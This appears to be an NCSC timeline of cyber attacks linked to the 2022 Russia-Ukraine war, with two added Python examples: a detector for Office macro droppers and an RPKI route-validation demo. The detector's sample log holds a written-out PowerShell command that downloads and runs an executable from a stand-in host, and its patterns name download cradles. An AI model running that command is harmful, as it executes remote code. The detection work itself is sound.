Digital attacks in Ukraine: A Timeline
News item | 10-03-2022 | 11:55
There has been frequent news reporting of digital attacks in Ukraine over the past month. This article provides a chronological overview of the reported cyber attacks and the subsequent publications.
Timeline
July
NCSC UK warned organisations to prepare for a heightened cyber threat over an extended period on account of the Russia-Ukraine conflict. In the NCSC UK's view, the cyber threat to the UK will continue to rise as a result of the conflict. Organisations are urged to keep their guard up and to have their cybersecurity experts prepare for longer-term resilience.
June
A disinformation campaign was used to spread a rumour that male Ukrainian refugees in Poland would be identified and sent back to Ukraine for military service. Researchers from cybersecurity firm Mandiant have attributed this to the Belarusian-linked threat actor GhostWriter.
According to the Ukrainian state service SSSCIP the intensity of cyberattacks on Ukrainian targets continues unabated. There have been almost 800 cyberattacks since the beginning of the war on 24 February 2022.
CERT-UA warned of cyberattacks targeting telecom companies in Ukraine using emails with a malicious attachment. The attachment is a password-protected RAR archive containing an Excel file with a macro. When the file is opened and the macro runs, a PowerShell command is launched that downloads and executes an EXE file, infecting the system with DarkCrystal malware.
After Lithuania banned the rail transportation of Russian goods (with the exception of foodstuffs and people) to Kaliningrad, various activist groups used platforms such as Telegram to urge cyberattacks on Lithuania’s critical infrastructure.
CERT-UA warned of cyberattacks against Russian research institutions, technical organisations and government bodies by Chinese-linked actors. The attackers use phishing emails with malicious attachments which, if opened by the user, eventually result in infection with Bisonal malware.
Microsoft published a report entitled ‘Defending Ukraine: Early Lessons from the Cyber War’, offering five conclusions after the first four months of the conflict between Russia and Ukraine.
CERT-UA warned of two types of attack. One involves delivery of a malicious .doc file, the other a malicious .rtf file. Both cause the download of an HTML file and exploitation of the CVE-2022-30190 vulnerability. In the case of the .doc file, Cobalt Strike is deployed; in the case of the .rtf file, CredoMap malware is deployed. The NCSC recently published an advisory about the CVE-2022-30190 vulnerability.
Threat actor Killnet appealed on Telegram to various ransomware actors, such as Conti and REvil, to launch joint cyberattacks on organisations in the United States, Italy and Poland. According to a Kremlin spokesman, a DDoS attack on Friday delayed President Putin’s speech at the International Economic Forum in St Petersburg by an hour.
Hacktivist collective Belarusian Cyber-Partisans claimed to have gained access to wiretapped conversations, including some from the Russian embassy in Belarus. The recordings are said to have been made between 2020 and 2021.
Hacking group Anonymous claimed to have hacked a Russian drone manufacturer. They also published images of some of the information obtained.
Following a cyberattack, the web address for the Ministry of Construction, Housing and Utilities of the Russian Federation was redirected to a pro-Ukrainian message: ‘Glory to Ukraine’. The hackers also demanded a ransom in order to prevent the leaking of site users’ personal data. According to RIA, a Russian state news outlet, a ministry representative confirmed that the site was offline but that user data had not been compromised.
The broadcasting of the World Cup qualifier between Wales and Ukraine was interrupted by a cyberattack in Ukraine directed at OLL.TV. According to the State Service of Special Communications and Information Protection of Ukraine (SSSCIP), hackers had gained access to a content delivery network (CDN) and had then managed to reroute traffic. As a result, various Ukrainian broadcasters displayed Russian propaganda. OLL.TV confirmed the attack on Facebook.
CERT-UA warned of cyberattacks using malicious email attachments targeting various Ukrainian government organisations. The emails deliver a document containing a malicious URL that redirects unsuspecting victims to an HTML file with embedded JavaScript. If executed, the CVE-2021-40444 and CVE-2022-30190 vulnerabilities are exploited to launch a PowerShell command, download an EXE file and infect the targeted system with Cobalt Strike Beacon. The NCSC has published an advisory regarding the CVE-2022-30190 vulnerability.
May
Hacking group Anonymous claimed to have attacked Belarusian government websites in retaliation for Belarus’s alleged support for the Russian invasion.
Researchers at security company SEKOIA.IO have observed cyber reconnaissance activities by Russian threat actor Turla. This observation is based on previous findings by Google’s Threat Analysis Group (TAG) (see also the entry for 3 May 2022 on this timeline). The activities targeted the Baltic Defence College, the Austrian Economic Chamber and NATO’s e-Learning platform known as JADL. The Austrian Economic Chamber was involved in the imposition of sanctions against Russia.
Pro-Russian hackers launched cyberattacks on various Italian government organisations. On Friday 20 May, the Italian embassy in London tweeted that access to the website of the Italian Ministry of Foreign Affairs and its embassies was limited as a result of cyberattacks.
The Italian authorities managed to thwart DDoS attacks by the actor Killnet. These attacks were launched during the live performances and voting rounds of the Eurovision Song Contest. In response to this failed attack, the actor declared its intention to launch cyberattacks on websites of organisations in the United States, the United Kingdom, Germany, Latvia, Romania, Estonia, Poland, Ukraine, Lithuania and Italy.
Threat actor Killnet directed DDoS attacks against various Italian government and commercial websites.
The same day, CERT-UA warned about emails with the subject ‘Щодо проведення акції помсти у Херсоні!’ (‘Re: retaliatory action in Kherson!’) which contain an HTM file. Once the file is clicked on, GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer. CERT-UA has attributed this attack to the Russian threat actor UAC-0010 (Gamaredon).
The European Union and its international partners strongly condemned the cyberattack on the KA-SAT satellite network. The attack was attributed to the Russian Federation. It took place shortly before the Russian invasion of Ukraine on 24 February 2022 and had a significant impact on various public authorities, businesses and citizens in Ukraine. Spill-over effects were also felt in several EU member states.
Several media outlets reported that as a result of a cyberattack, Russian satellite TV menus had shown various anti-war slogans just before the Victory Day parade in Moscow.
CERT-UA warned of emails with the subject ‘хімічної атаки’ (‘chemical attack’). The emails contain a link to an XLS document with a macro. When the macro is activated, it downloads and executes malware that infects the victim’s computer with JesterStealer, which steals sensitive information and sends it to the attacker.
Google reported in a blog post that it had observed cyber activities by various actors in relation to the war in Ukraine:
- The Russian-based actor APT28 (aka Fancy Bear) has been targeting users in Ukraine with a new malware variant, which is distributed via email attachments inside password-protected zip files.
- Google has again observed activity by the Russia-based threat actor COLDRIVER (see the update of 31 March in this timeline). According to Google, phishing emails have been sent to targets including government officials, politicians, NGOs and journalists.
- The Chinese-based actor Curious Gorge is continuing its long-running campaigns against multiple government, manufacturing, military and logistics organisations in Russia and Ukraine.
- Google has observed cyberattacks by the Russian-linked actor Turla, which targets the Baltic states and attempts to compromise defence and cybersecurity organisations in the region.
- Lastly, Google reported that the Belarusian threat actor GhostWriter was still active and was targeting Ukrainian citizens with its phishing attacks.
The UK’s Foreign, Commonwealth & Development Office (FCDO) claimed on the basis of government-funded research that Russian disinformation about the war in Ukraine was being spread by means of a troll factory. According to the FCDO, the accounts of various politicians and specific audiences in the UK, India and South Africa are being targeted. According to the UK experts, the research shows how the Kremlin’s large-scale disinformation campaign is designed to manipulate international public opinion of the war in Ukraine.
April
In collaboration with the Computer Security Incident Response Team of the National Bank of Ukraine (CSIRT-NBU), CERT-UA has observed distributed denial-of-service (DDoS) attacks on various Ukrainian government and other organisations, carried out using compromised websites. The websites are compromised by inserting malicious JavaScript code (BrownFlood) into their pages; as a result, visitors’ browsers generate large numbers of requests to the chosen targets, in this case various Ukrainian government and other organisations.
Microsoft issued a report containing details about Russian cyberattacks observed during the war between Russia and Ukraine. Since the Russian invasion, Microsoft has observed over 200 cyberattacks against Ukrainian organisations and individuals. A number of these attacks appeared to be coordinated with kinetic military operations, according to Microsoft. The report, which includes a detailed timeline of the Russian cyberattacks, was released in order to help boost the resilience of organisations including critical providers and central government.
After introducing a new postage stamp, Ukraine’s national postal service, Ukrposhta, was hit by a DDoS attack. The stamp shows a Ukrainian soldier making an offensive gesture to the Russian warship Moskva, which has since sunk.
On the CISA website, the United States, Australia, New Zealand, Canada and the United Kingdom posted a joint warning regarding cyber activity by Russian criminal and state actors aimed at critical infrastructure. This activity may be a form of retaliation for the sanctions imposed on Russia and the material support provided to Ukraine by the Western allies and partners.
Shuckworm (aka Gamaredon and Armageddon), a malicious actor linked to Russia, continues to target organisations in Ukraine. For this purpose it uses various versions of the malware Backdoor.Pterodo. The frequency of the attacks means that it remains one of the main cyber threats facing organisations in the region.
CERT-UA issued a warning about phishing emails that claim to originate from CERT-UA itself, with the subject ‘Srochno!’ (‘Urgent’). The emails, which target Ukrainian organisations, include an .xls attachment containing a macro. When the macro is activated, it downloads and runs a file that infects the computer with Cobalt Strike Beacon.
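The CERT-UA warnings above about the DarkCrystal, JesterStealer and Cobalt Strike Beacon campaigns all describe the same delivery chain: an Office document with a macro launches PowerShell, which downloads and runs an executable. That chain leaves a recognisable trace in endpoint process-creation logs, which is what most organisations can hunt for even without samples. The following Python is an added example, not code from the original article or from CERT-UA; the log records and command lines are constructed, and the field names are assumptions (any EDR or Sysmon Event ID 1 export with parent image, image and command line fields can be mapped onto them).

```python
import re
from dataclasses import dataclass

# Office applications that should rarely spawn a script host or shell.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Child processes typically used by macro droppers to fetch the next stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "bitsadmin.exe"}
# Download-cradle and evasion indicators in PowerShell/cmd command lines.
CRADLE_PATTERNS = {
    "downloadfile": re.compile(r"downloadfile", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "invoke-webrequest": re.compile(r"invoke-webrequest|\biwr\b", re.I),
    "net.webclient": re.compile(r"net\.webclient", re.I),
    "encodedcommand": re.compile(r"\s-e(nc(odedcommand)?)?\s", re.I),
    "certutil-urlcache": re.compile(r"certutil(\.exe)?\s+-urlcache", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


@dataclass
class ProcEvent:
    """One process-creation record (assumed field names, roughly Sysmon Event ID 1)."""
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return a finding dict if an Office app spawned a script host, else None."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(ev.command_line)]
    # Office -> script host alone is suspicious; a download cradle in the
    # command line is what the campaigns above look like, so rate it high.
    return {"host": ev.host, "parent": parent, "child": child,
            "severity": "high" if hits else "medium", "indicators": hits}


def detect(events):
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample log: one macro dropper, one benign Office child,
# one unrelated PowerShell run, one Office -> cmd without a cradle.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://example.invalid/update.exe','C:\\Users\\Public\\update.exe');"
              "Start-Process C:\\Users\\Public\\update.exe\""),
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent("ws03", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints two findings: the Excel-to-PowerShell download cradle on ws01 (high) and the Word-to-cmd spawn on ws03 (medium). The medium tier exists because legitimate add-ins occasionally spawn cmd.exe; tune OFFICE_PARENTS and SCRIPT_HOSTS to your estate rather than suppressing the rule.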
The activist hacker group KillNet carried out DDoS attacks on various websites belonging to airports, government bodies and transport organisations in Europe. These attacks rendered the sites of some organisations temporarily unavailable.
Analysing an attack on a Ukrainian energy company, cybersecurity firm ESET and CERT-UA discovered new malware, Industroyer2, which targets industrial control systems (ICS). Other malware, including various wipers, was also used in the attack. More details about this malware are available on the ESET and CERT-UA websites. According to ESET and CERT-UA, the attack was successfully averted.
A denial-of-service attack rendered the websites of the Finnish ministries of Defence and Foreign Affairs temporarily unavailable. The attack started around noon, as Ukraine’s President Zelenskyy was addressing the Finnish parliament.
Microsoft announced that it had disrupted cyberattacks targeting Ukraine by Strontium, a Russian state actor with ties to the GRU intelligence service. Strontium was attempting to compromise Ukrainian government institutions and media organisations and was also targeting EU and US government agencies and foreign policy think tanks. Strontium used seven internet domains to gain access to its victims.
CERT-UA reported the discovery of various malicious files that could be used in a spear-phishing attack. The files had English names and targeted a government organisation in Latvia. CERT-UA attributed this attack to UAC-0010 (Armageddon).
The same day, CERT-UA also reported that Ukrainian government organisations had been targeted by Armageddon, again via spear-phishing. Targets received malicious files that purported to contain personal details of suspected war criminals.
March
Google published a blog post about the Russia-based threat actor COLDRIVER, which is alleged to have launched phishing campaigns against various targets, including a NATO department. Google has no evidence that these attempts were successful. The group has been active since 2015 and has previously attacked targets such as ministries, NGOs and journalists.
A major distributed denial-of-service (DDoS) attack on the Ukrainian internet service provider Ukrtelecom temporarily made its services unavailable to customers.
A Russian internet provider briefly hijacked part of Twitter’s address space via BGP. The announcement had little effect in the end because Twitter’s prefixes are covered by RPKI Route Origin Authorisations, so networks that perform route origin validation rejected the bogus route.
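To make the RPKI point concrete: the prefix holder publishes Route Origin Authorisations (ROAs) stating which AS may originate a prefix and up to what prefix length, and a router doing route origin validation (RFC 6811) compares every received announcement against those ROAs. The Python below is an added example, not code from the original article or from any router vendor; the prefixes are RFC 5737 documentation ranges and the AS numbers are private ASNs, all constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    """Route Origin Authorisation: `asn` may originate `prefix` and any
    more-specific prefix up to `max_length` bits (RFC 6482)."""
    prefix: str
    max_length: int
    asn: int


def validate(announced_prefix: str, origin_asn: int, roas) -> str:
    """RFC 6811 route origin validation.

    valid:     a covering ROA exists whose AS matches the origin and whose
               max_length is not exceeded by the announced prefix length
    invalid:   at least one ROA covers the prefix but none matches, i.e. a
               hijack from the wrong AS or an over-specific announcement
    not-found: no ROA covers the prefix at all, so RPKI says nothing
    """
    announced = ipaddress.ip_network(announced_prefix, strict=True)
    covered = False
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=True)
        if announced.version != roa_net.version or not announced.subnet_of(roa_net):
            continue  # this ROA says nothing about the announced prefix
        covered = True
        if roa.asn == origin_asn and announced.prefixlen <= roa.max_length:
            return "valid"
    return "invalid" if covered else "not-found"


def accept(announcements, roas, drop_invalid=True):
    """The common operator policy: reject 'invalid', accept 'valid' and 'not-found'."""
    kept = []
    for prefix, asn in announcements:
        state = validate(prefix, asn, roas)
        if drop_invalid and state == "invalid":
            continue
        kept.append((prefix, asn, state))
    return kept


# Constructed data: AS64500 is the legitimate holder, AS64511 plays the hijacker.
ROAS = [ROA("192.0.2.0/24", 24, 64500)]
ANNOUNCEMENTS = [
    ("192.0.2.0/24", 64500),     # legitimate origin
    ("192.0.2.0/24", 64511),     # same prefix from the wrong AS: hijack
    ("192.0.2.0/25", 64500),     # right AS, but more specific than max_length
    ("198.51.100.0/24", 64511),  # no ROA at all
]

if __name__ == "__main__":
    for prefix, asn in ANNOUNCEMENTS:
        print(prefix, asn, validate(prefix, asn, ROAS))
```

Two caveats follow from the code. First, only networks that actually perform route origin validation drop the invalid route; the hijack still propagates among those that do not, which is why the effect was limited rather than zero. Second, "not-found" is accepted by essentially every operator, so a prefix without a ROA gets no protection at all, and a ROA with a loose max_length invites an "invalid"-free more-specific hijack from the authorised AS's number.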
Three Russian spies spent five years targeting energy infrastructure in 135 countries, in an effort to enable the Russian government to gain remote control of power plants, the US Department of Justice alleged in an indictment unsealed on Thursday.
On Twitter, the hacking group Anonymous called on businesses to withdraw from Russia within 48 hours or become targets of the group. The group had previously published details of Russian companies.
CERT-UA reported new wiper malware known as DoubleZero, which is spread via .zip files.
US President Joe Biden warned businesses in the United States about potential Russian cyberattacks, including in response to the sanctions the West has imposed on Russia.
CERT-UA warned of attacks by InvisiMole, a hacking group with ties to the Russian advanced persistent threat (APT) group Gamaredon.
The hacking group Anonymous warned Western companies to sever ties with Russia and threatened targeted actions.
Security Affairs reported on a destructive version of the node-ipc npm package, a software supply-chain attack targeting systems in Russia and Belarus.
Ukraine’s Computer Emergency Response Team (CERT-UA) reported a phishing campaign in which mass mailings were sent out in the name of the Ukrainian government. The attacks used Cobalt Strike, GrimPlant and GraphSteel.
ESET researchers also discovered new wiper malware in Ukraine, named CaddyWiper. Wiper malware presents itself as ransomware, but the affected systems or files cannot be recovered.
Anonymous leaked 20 terabytes of data following a cyberattack on the German subsidiary of the Russian oil company Rosneft. In response, Germany’s Federal Office for Information Security (BSI) issued a warning to vital sectors.
Der Spiegel reported that the BSI, part of the German Federal Ministry of the Interior and Community, was warning of an expected cyberattack on critical infrastructure in retaliation for the assistance Germany has given Ukraine since the start of the war.
The Security Service of Ukraine (SSU) reported that hackers had posted messages of surrender on local government websites. The SSU announced on Twitter that this was disinformation and urged people to ignore the messages. The Ukrainian ambassador to the United Kingdom also tweeted that the embassy’s official website and email were not working because of cyberattacks.
The Ukrainian government urged tech companies to sever their business ties with Russia, and various tech companies stopped providing some or all services there. Cybersecurity firm Proofpoint reported a spear-phishing campaign by various state actors targeting European government organisations; the campaign appeared to be an attempt to obtain information about the reception and migration of Ukrainian refugees.
February
The Belarusian Cyber-Partisans claimed to have carried out a cyberattack on the Belarusian railways to obstruct the transfer of Russian troops. A recent overview of cyber groups involved in the war, including state actors such as Sandworm, can be found here.
Taking the latest developments into consideration, the NCSC has published a perspective for action and threat-specific measures.
At this moment, there have been no observations of digital attacks on the Netherlands or its interests.
The rival ransomware group LockBit, in contrast, reported that it remains neutral in the war and is motivated exclusively by financial gain.
Ukraine’s Minister of Digital Transformation called on hackers worldwide to join a “Ukrainian IT Army”.
The ransomware group Conti declared in a public statement that it was siding with Russia. In support of Russia, Conti threatened attacks on the critical infrastructure of countries opposing Russia.
After Russian troops invaded Ukraine, various non-state actors became involved in the conflict. On the evening of the invasion, the hacker collective Anonymous declared war on Russia. Volunteers associated with the collective then claimed to have taken down various Russian government and media websites with DDoS attacks, and to have obtained sensitive data from the Russian Ministry of Defence. Such claims cannot always be verified, which can cause uncertainty and confusion.
Various parties reported a new wiper malware observed on Ukrainian systems; ESET, Symantec and SentinelOne, among others, published analyses. The malware has been named HermeticWiper. It is functionally similar to the WhisperGate wiper campaign observed on 13 and 14 January. The wiper’s goal is to corrupt documents and prevent affected computers from booting. It appears to operate more thoroughly than the wiper used in the previous campaign. So far there are no indications that this wiper has worm functionality that would let it spread by itself to other systems on the network.
CERT-UA published a report on its website about malicious activity it attributes to the actor Buhtrap. The malware campaigns appear to have been intended to gain a foothold in victims’ networks. On 23 February, heavy DDoS attacks were carried out on Ukrainian targets. Various government websites, including those of several ministries, were temporarily degraded or fully unavailable. Multiple phishing campaigns were reported at the same time.
Various cyberattacks were conducted against targets in Ukraine, including DDoS (distributed denial-of-service) attacks, which aim to exhaust the capacity of online services or of the servers and network equipment behind them. The Ministry of Defence and two national banks in Ukraine were hit.
A further text-message campaign claimed that ATMs were suffering a technical malfunction. Ukrainian authorities stated that this was disinformation and that no such malfunction existed. At this moment the NCSC has no concrete indications that targeted attacks on organisations in the Netherlands are related to the current situation in Ukraine.
January
CERT-UA published part of its research into both the defacements and the malware attack. The research found strong similarities between the WhisperGate malware and the WhiteBlackCrypt ransomware. According to CERT-UA, these similarities suggest that the attacker intended to make it appear that Ukraine itself was behind the cyberattacks.
Microsoft published a blog post on the WhisperGate malware (also called WhisperKill) that had been deployed against various (government) organisations in Ukraine. WhisperGate is wiper malware that pretends to be ransomware but offers no way to recover affected systems or documents: documents are effectively erased and the operating system is rendered unusable. Unlike the NotPetya wiper, which had a worldwide impact in 2017, WhisperGate has no ability to spread on its own without human interaction. As a result, the observed WhisperGate malware poses a significantly lower risk to the Netherlands.
The Ukrainian security service SSU published a statement about an attack on the websites of various government bodies. Messages posted on the websites stated, in threatening language in Polish, Ukrainian and Russian, that the personal data of Ukrainian citizens had been stolen and that citizens should “prepare for the worst”. Attacks in which a website’s content is replaced in this way are called ‘defacements’. A subsequent SSU statement indicated that this was most likely a supply chain attack on the supplier that maintained the websites, possibly combined with a vulnerability in October CMS (CVE-2021-32648) and Log4j. The supplier had elevated permissions in the environment that allowed the websites to be modified.
After these large attacks, the national CERT of Ukraine issued multiple warnings about other campaigns targeting government agencies. Several cybersecurity companies also published research following the cyberattacks in Ukraine; Palo Alto Networks Unit 42, Symantec and Microsoft, for instance, examined the activities of Gamaredon, also known as ACTINIUM. So far, Gamaredon’s activities have not been linked to the cyberattacks of 14 January. Gamaredon is a well-known actor that has so far focused on Ukrainian targets.
Perspective for action
Neither the WhisperGate attack nor the other attacks carried out in Ukraine have led to so-called ‘spill-over effects’ in the Netherlands. Nevertheless, organisations are advised to apply the NCSC’s basic cybersecurity measures and to take note of the AIVD and MIVD publication ‘Cyberattacks by state actors: seven moments to stop an attack’ [available in Dutch only]. In particular, the basic measure of network segmentation can help to prevent an attack on a connected network from affecting your organisation.
The NCSC keeps monitoring the developments closely and shares relevant information wherever possible.